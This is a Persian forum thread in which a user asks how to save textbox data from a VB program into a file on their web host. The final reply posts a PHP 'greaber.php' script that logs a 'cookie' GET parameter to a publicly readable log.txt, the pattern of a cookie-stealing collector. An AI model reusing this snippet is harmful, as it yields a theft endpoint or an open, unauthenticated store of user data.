نمایش نتایج 1 تا 5 از 5

نام تاپیک: ذخيره اطلاعات در فايل درون هاست

  1. #1
    کاربر تازه وارد
    تاریخ عضویت
    فروردین 1388
    پست
    55

    Question ذخيره اطلاعات در فايل درون هاست

    با سلام خدمت اساتيد
    من ميخواستم يه سري اطلاعات رو كه مثلا تو تكست باكس1 هست رو تو يه فايل اضافه كنم كه روي هاستم هست. مثلا آدرس زير:
    http://www.mysite.com/myfiles/etelaat.txt
    1. هاست خريداري شده هست و نه رايگان و امكان استفاده از FTP هم داره

  2. #2
    کاربر دائمی آواتار Dr.Bronx
    تاریخ عضویت
    مهر 1386
    محل زندگی
    Hosna Soft
    پست
    1,108

    نقل قول: ذخيره اطلاعات در فايل درون هاست

    اولا : برای یک سوال 2 تا تاپیک نزنید .

    شما اگر می خواهید با FTP کار کنید ابتدا باید با پروتوکل های اون آشنا بشید
    http://www.w3.org/Protocols/rfc959/

    در این سایت هم دستوراتی برای کار با Ftp هست : http://www.cs.colostate.edu/helpdocs/ftp.html

    بعد هم برید به این سایت : http://www.daniweb.com/forums/post72...tml#post728056

    و فایل ضمیمه با نام : Backup InetFTP.zip

    را دانلود کنید . ظاهرا برای همین کار طراحی شده .

    موفق باشید

  3. #3
    کاربر دائمی
    تاریخ عضویت
    مهر 1388
    محل زندگی
    R0)ot -> Main();
    پست
    1,158

    نقل قول: ذخيره اطلاعات در فايل درون هاست

    نقل قول نوشته شده توسط sina32 مشاهده تاپیک
    با سلام خدمت اساتيد
    من ميخواستم يه سري اطلاعات رو كه مثلا تو تكست باكس1 هست رو تو يه فايل اضافه كنم كه روي هاستم هست. مثلا آدرس زير:
    http://www.mysite.com/myfiles/etelaat.txt
    1. هاست خريداري شده هست و نه رايگان و امكان استفاده از FTP هم داره
    دوست عزیز بهترین کار استفاده از FtP در مرحله اول هست .

    در مرحله دوم شما می تونید به جای FTP از یه فایل که کل کاره مدیریتی شمارو براساس مقدار هایی انجام بده .

    مثلا یه فایل PHP می نویسین که اگر پیغام نوشتن دادین بره و این کار هارو بکنه .

    باتشکر احسان

  4. #4
    کاربر تازه وارد
    تاریخ عضویت
    فروردین 1388
    پست
    55

    نقل قول: ذخيره اطلاعات در فايل درون هاست

    نقل قول نوشته شده توسط Dr.Bronx مشاهده تاپیک
    اولا : برای یک سوال 2 تا تاپیک نزنید .
    ببخشید! من کی 2تا تاپیک زدم برا یه سوال؟
    (سوالام متفاوت بود: یکی آپلود فایل بود و اون یکی فقط ذخیره مقادیر در یه فایل از قبل ساخته شده)

    درضمن کد وی.بی رو فقط اون قسمتاییش که مربوط به نت میشه رو کم بلدم! مثلا در این مورد، نه که ندونم کار با پروتکل ها و ...


    استفاده از php هم بد نیست! ولی خوب اینطور یه خورده اُپن سورس میشه
    آخرین ویرایش به وسیله sina32 : چهارشنبه 06 آبان 1388 در 11:23 صبح

  5. #5
    کاربر دائمی آواتار hasht.rood
    تاریخ عضویت
    آذر 1389
    محل زندگی
    هشترود
    سن
    40
    پست
    101

    نقل قول: ذخيره اطلاعات در فايل درون هاست

    چرا كار رو پيچيده ميكنيد دوستان ؟
    يك فايل php در سرور مسازيد و كدهاي زير رو داخلش كپي ميكنيد و اسمش رو ميزارين greaber.php
    <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>

    و بعدش با يك دستور ساده به شكل زير محتويات تكست باكستون رو به سرور ارسال ميكنين و در اونجا فايل php تكست رو گرفته و در داخل يك فايل با نام log.txt ذخيره ميكنه
    web.Navigate "http://sitename.com/greaber.php?cookie=" & "User Name:" & text1

    حالا ميتونيد با رفتن به ادرس http://sitename.com/log.txt محتويات text1 رو ببينين
    اگر سوالي داشتين در خدمتم
    موفق باشين

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •